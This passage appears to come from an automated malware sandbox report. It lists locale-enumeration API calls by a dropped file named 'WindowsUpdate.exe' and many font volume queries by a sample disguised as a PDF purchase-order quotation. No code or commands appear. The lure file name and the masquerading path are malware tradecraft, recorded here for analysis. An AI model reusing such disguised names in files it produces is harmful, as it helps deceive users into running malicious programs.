              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: EnumSystemLocalesW,11_2_00F059D7
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: EnumSystemLocalesW,11_2_00F0596E
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: EnumSystemLocalesW,11_2_00F05A72
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,11_2_00F05B00
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: GetLocaleInfoW,11_2_00F05D50
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,11_2_00F05E79
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: GetLocaleInfoW,11_2_00F05F81
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: GetLocaleInfoW,11_2_00EF8F37
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
